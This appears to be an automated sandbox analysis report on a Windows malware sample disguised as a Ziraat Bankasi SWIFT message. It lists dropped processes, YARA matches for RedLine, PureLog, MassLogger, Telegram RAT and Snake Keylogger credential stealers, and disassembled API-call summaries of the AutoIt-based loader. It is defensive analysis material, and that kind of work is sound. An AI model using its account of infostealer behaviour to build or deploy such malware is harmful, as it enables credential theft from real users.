Commandline:	"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Imagebase:	0xcc0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:27:05
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\bothsided\spadixes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Imagebase:	0x8c0000
File size:	2'267'136 bytes
MD5 hash:	FA7DCECB3C5AC81610C93C6B91CDA38A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000021.00000002.1489110172.00000000035A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:27:06
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Imagebase:	0xcc0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000022.00000003.1483462887.0000000008600000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000022.00000002.1577778530.0000000005E00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000022.00000002.1596364234.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000022.00000002.1574359559.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000022.00000002.1580669736.0000000007205000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000022.00000002.1596182253.0000000008640000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	14:19:15
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\Temp\TrojanAI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"
Imagebase:	0x30000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	14:19:24
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0xc70000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	1.2%
Signature Coverage:	9.1%
Total number of Nodes:	1564
Total number of Limit Nodes:	57

Executed Functions

Function 000AB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14b37e99e6b67c2d3a7853a518fd08583b6d7efd2b54fe0d79ab11d15510882d
Instruction ID: f4cb2f8d5b1020c0955541c39b621468e93228d942a4e44f599a032a96de33c6
Opcode Fuzzy Hash: 14b37e99e6b67c2d3a7853a518fd08583b6d7efd2b54fe0d79ab11d15510882d
Instruction Fuzzy Hash: 9A325F75B022288BCB249F98DC456E9B7F5FF4B310F1841D9E40AA7A92D7749E80CF52

Function 0009DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?,00000000), ref: 0009DDEC
GetCurrentProcess.KERNEL32(00000000,0011DC38,?,?), ref: 0009DEAC
GetNativeSystemInfo.KERNELBASE(?,0011DC38,?,?), ref: 0009DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0009DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0009DF1F
GetSystemInfo.KERNEL32(?,0011DC38,?,?), ref: 0009DF29
GetSystemInfo.KERNEL32(?,0011DC38,?,?), ref: 0009DF35

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: e6ff429fbc7079cbc2976759ef95aa38d0decbe191059c992a093441662d2599
Instruction ID: 0f568be449be72a5072068f69184c918341d0e0f9684b264beb8d63b68ce92d5
Opcode Fuzzy Hash: e6ff429fbc7079cbc2976759ef95aa38d0decbe191059c992a093441662d2599
Instruction Fuzzy Hash: AC61C1B180A384CFCF15DF6898C11ED7FB4AF29300B1989EAD8859F24BC674C949DB65

Function 00083D98 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00083DC8

Part of subcall function 00086430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00083DEE,00141148,?), ref: 00086471

SetCurrentDirectoryW.KERNEL32(?), ref: 00083E48
SetCurrentDirectoryW.KERNEL32(?,00141148,?), ref: 000F1D06
GetForegroundWindow.USER32(runas,?,?,?,?,?,0011DAB4,00141148,?), ref: 000F1D89
ShellExecuteW.SHELL32(00000000,?,?,0011DAB4,00141148,?), ref: 000F1D90

Part of subcall function 00083E6E: GetSysColorBrush.USER32(0000000F), ref: 00083E79
Part of subcall function 00083E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00083E88
Part of subcall function 00083E6E: LoadIconW.USER32(00000063), ref: 00083E9E
Part of subcall function 00083E6E: LoadIconW.USER32(000000A4), ref: 00083EB0
Part of subcall function 00083E6E: LoadIconW.USER32(000000A2), ref: 00083EC2
Part of subcall function 00083E6E: RegisterClassExW.USER32(?), ref: 00083F30

Part of subcall function 000836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 000836E6
Part of subcall function 000836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00083707
Part of subcall function 000836B8: ShowWindow.USER32(00000000), ref: 0008371B
Part of subcall function 000836B8: ShowWindow.USER32(00000000), ref: 00083724

Part of subcall function 00084FFC: _memset.LIBCMT ref: 00085022
Part of subcall function 00084FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000850CB

Strings

runas, xrefs: 000F1D84

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$IconLoad$CreateCurrentDirectoryFullNamePathShow$BrushClassColorCursorExecuteForegroundNotifyRegisterShellShell__memset
String ID: runas
API String ID: 4126474716-4000483414
Opcode ID: 0de8e466a2cb92bc975e4d4d327032254760a52caf74fb820f10573b928ea13f
Instruction ID: d6d0a46309f228cb3bb18c55937c70c899b9ceb33593969a7365e3beae305fc3
Opcode Fuzzy Hash: 0de8e466a2cb92bc975e4d4d327032254760a52caf74fb820f10573b928ea13f
Instruction Fuzzy Hash: 4731CF75E04248BADF11BBF0EC05EED7B75BB56B04F004069E681665A3DB7446C5CB21

Function 0008406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0008449E,?,?,00000000,00000001), ref: 0008407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0008449E,?,?,00000000,00000001), ref: 00084092
LoadResource.KERNEL32(?,00000000,?,?,0008449E,?,?,00000000,00000001,?,?,?,?,?,?,000841FB), ref: 000F4F1A
SizeofResource.KERNEL32(?,00000000,?,?,0008449E,?,?,00000000,00000001,?,?,?,?,?,?,000841FB), ref: 000F4F2F
LockResource.KERNEL32(0008449E,?,?,0008449E,?,?,00000000,00000001,?,?,?,?,?,?,000841FB,00000000), ref: 000F4F42

Strings

SCRIPT, xrefs: 00084088

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 6f1bd41e807b57067dec9e07a111fd9f22c2dc2232f34f3c97252202605ac1e1
Instruction ID: fc3a8ea084ade17ff139578ca25a4ac0dac90b3aadb8eeae9f363ff824f0af7e
Opcode Fuzzy Hash: 6f1bd41e807b57067dec9e07a111fd9f22c2dc2232f34f3c97252202605ac1e1
Instruction Fuzzy Hash: AC113C71200711BFE7219B65EC48F677BB9EBC5B51F10816CF682966A0DBB1DC408A20

Function 000C6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,000F2F49), ref: 000C6CB9
FindFirstFileW.KERNELBASE(?,?), ref: 000C6CCA
FindClose.KERNEL32(00000000), ref: 000C6CDA

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 5a7b279228f21a94a9e39e5a095b2978824a8f1a3e92a633c6d7ad411bd01890
Instruction ID: 051fb504af5a60bc8a58de33c7f62eebb342e38dbfd40a8980e0327ceb558082
Opcode Fuzzy Hash: 5a7b279228f21a94a9e39e5a095b2978824a8f1a3e92a633c6d7ad411bd01890
Instruction Fuzzy Hash: 09E09A31810410AB82206778AC498AE36ACEF06339B10075AF8B2C21E0EBB6998086D6

Function 0009335A Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: ed53948b57ebb96309eb64a45b1bf2257701b9af353c4147b11665c3d9bbee9c
Instruction ID: 9e3fb0d792943ee47c6329cfff0da13b43392cd50c75f5d4cb5220a183a2a53d
Opcode Fuzzy Hash: ed53948b57ebb96309eb64a45b1bf2257701b9af353c4147b11665c3d9bbee9c
Instruction Fuzzy Hash: B4429C70608341DFDB64DF18C484B6ABBE1BF84304F15886DE99A8B662C731ED45EF92

Function 000B5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 000B5EC3
___createFile.LIBCMT ref: 000B5F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000B5F2D
__dosmaperr.LIBCMT ref: 000B5F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 000B5F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000B5F6A
__dosmaperr.LIBCMT ref: 000B5F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000B5F7C
__set_osfhnd.LIBCMT ref: 000B5FAC
__lseeki64_nolock.LIBCMT ref: 000B6016
__close_nolock.LIBCMT ref: 000B603C
__chsize_nolock.LIBCMT ref: 000B606C
__lseeki64_nolock.LIBCMT ref: 000B607E
__lseeki64_nolock.LIBCMT ref: 000B6176
__lseeki64_nolock.LIBCMT ref: 000B618B
__close_nolock.LIBCMT ref: 000B61EB

Part of subcall function 000AEA9C: CloseHandle.KERNELBASE(00000000,0012EEF4,00000000,?,000B6041,0012EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000AEAEC
Part of subcall function 000AEA9C: GetLastError.KERNEL32(?,000B6041,0012EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000AEAF6
Part of subcall function 000AEA9C: __free_osfhnd.LIBCMT ref: 000AEB03
Part of subcall function 000AEA9C: __dosmaperr.LIBCMT ref: 000AEB25

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

__lseeki64_nolock.LIBCMT ref: 000B620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000B6342
___createFile.LIBCMT ref: 000B6361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000B636E
__dosmaperr.LIBCMT ref: 000B6375
__free_osfhnd.LIBCMT ref: 000B6395
__invoke_watson.LIBCMT ref: 000B63C3
__wsopen_helper.LIBCMT ref: 000B63DD

Strings

@, xrefs: 000B5F98

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: d15aaab1182c0bdf17ebd0b787caf0cea268d732a6acad142dba68488940bb20
Instruction ID: d03a8ad8df0568bc52204f7fb6954f113e4c72307c390aae1314925c7fa7f588
Opcode Fuzzy Hash: d15aaab1182c0bdf17ebd0b787caf0cea268d732a6acad142dba68488940bb20
Instruction Fuzzy Hash: F32238719046069FEF299FA8DC45BFD7BB1EB05324F284269E5219B2D2C73A8D40C751

Function 000CFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 000CFA96
_wcschr.LIBCMT ref: 000CFAA4
_wcscpy.LIBCMT ref: 000CFABB
_wcscat.LIBCMT ref: 000CFACA
_wcscat.LIBCMT ref: 000CFAE8
_wcscpy.LIBCMT ref: 000CFB09
__wsplitpath.LIBCMT ref: 000CFBE6
_wcscpy.LIBCMT ref: 000CFC0B
_wcscpy.LIBCMT ref: 000CFC1D
_wcscpy.LIBCMT ref: 000CFC32
_wcscat.LIBCMT ref: 000CFC47
_wcscat.LIBCMT ref: 000CFC59
_wcscat.LIBCMT ref: 000CFC6E

Part of subcall function 000CBFA4: _wcscmp.LIBCMT ref: 000CC03E
Part of subcall function 000CBFA4: __wsplitpath.LIBCMT ref: 000CC083
Part of subcall function 000CBFA4: _wcscpy.LIBCMT ref: 000CC096
Part of subcall function 000CBFA4: _wcscat.LIBCMT ref: 000CC0A9
Part of subcall function 000CBFA4: __wsplitpath.LIBCMT ref: 000CC0CE
Part of subcall function 000CBFA4: _wcscat.LIBCMT ref: 000CC0E4
Part of subcall function 000CBFA4: _wcscat.LIBCMT ref: 000CC0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 000CFA61

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 2a22c8c2606b9c49430ba2a11c22e34154a878c6e255f60e29e6877f768c8738
Instruction ID: 44a753674bf34f0c164d04a6cfd2749f0c89dd07830eac2a34032ae9dcd218df
Opcode Fuzzy Hash: 2a22c8c2606b9c49430ba2a11c22e34154a878c6e255f60e29e6877f768c8738
Instruction Fuzzy Hash: 1D91A072504306AFCB20EB54C851FEEB3E9BF94310F04482DF99997292DB30EA44CB92

Function 00083F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00083F86
RegisterClassExW.USER32(00000030), ref: 00083FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00083FC1
InitCommonControlsEx.COMCTL32(?), ref: 00083FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00083FEE
LoadIconW.USER32(000000A9), ref: 00084004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00084013

Strings

AutoIt v3 GUI, xrefs: 00083FA2
0, xrefs: 00083F68
+, xrefs: 00083F6F
TaskbarCreated, xrefs: 00083FB6

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 6d87f51828197666054686dfe9e881967e8aaa364f3d5aed0b2736da9037c3fe
Instruction ID: a137891b14474391f7d8662ad17fa92edf1a76e736d93982b145cf607699edc7
Opcode Fuzzy Hash: 6d87f51828197666054686dfe9e881967e8aaa364f3d5aed0b2736da9037c3fe
Instruction Fuzzy Hash: 0C21C7B9900318AFDB00DFE4E889BCDBBB4FB09714F01421AFA55A66A0D7F545C48F91

Function 000CBFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000CBDB4: __time64.LIBCMT ref: 000CBDBE

Part of subcall function 00084517: _fseek.LIBCMT ref: 0008452F

__wsplitpath.LIBCMT ref: 000CC083
_wcscpy.LIBCMT ref: 000CC096
_wcscat.LIBCMT ref: 000CC0A9
__wsplitpath.LIBCMT ref: 000CC0CE
_wcscat.LIBCMT ref: 000CC0E4
_wcscat.LIBCMT ref: 000CC0F7
_wcscmp.LIBCMT ref: 000CC03E

Part of subcall function 000CC56D: _wcscmp.LIBCMT ref: 000CC65D
Part of subcall function 000CC56D: _wcscmp.LIBCMT ref: 000CC670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000CC2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000CC338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000CC34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000CC35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000CC371

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64_fseek_wcscpy
String ID:
API String ID: 3728024260-0
Opcode ID: 7cb0cd1502d2e9c2337ce809aed339c4a2a5d049fa26fbbd03398386e48762ea
Instruction ID: cd893ad3215c7a8b13dd98688de1662eb276c7ccef53c9f06223db6a9ed210a7
Opcode Fuzzy Hash: 7cb0cd1502d2e9c2337ce809aed339c4a2a5d049fa26fbbd03398386e48762ea
Instruction Fuzzy Hash: 24C1F9B1900219ABDF21DF95DC81FDEBBB9BF49310F1040AAF609E6152DB719A848F61

Function 00083742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 000837B3
KillTimer.USER32(?,00000001), ref: 000837DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00083800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0008380B
CreatePopupMenu.USER32 ref: 0008381F
PostQuitMessage.USER32(00000000), ref: 0008382E

Strings

TaskbarCreated, xrefs: 00083806

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: ba06c82da5ce6558a59f93fd2bbae6dad5da28ce877bdf6d42c119b025e28ca9
Instruction ID: a358bc793d63c1a9a6e210b29bc9b5683619ac526b104b48f8edc6574afef61c
Opcode Fuzzy Hash: ba06c82da5ce6558a59f93fd2bbae6dad5da28ce877bdf6d42c119b025e28ca9
Instruction Fuzzy Hash: C04159F9108259BBDB347F68EC4ABBE3A95F781B01F000125F682925A2DF65DEC09761

Function 00083E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00083E79
LoadCursorW.USER32(00000000,00007F00), ref: 00083E88
LoadIconW.USER32(00000063), ref: 00083E9E
LoadIconW.USER32(000000A4), ref: 00083EB0
LoadIconW.USER32(000000A2), ref: 00083EC2

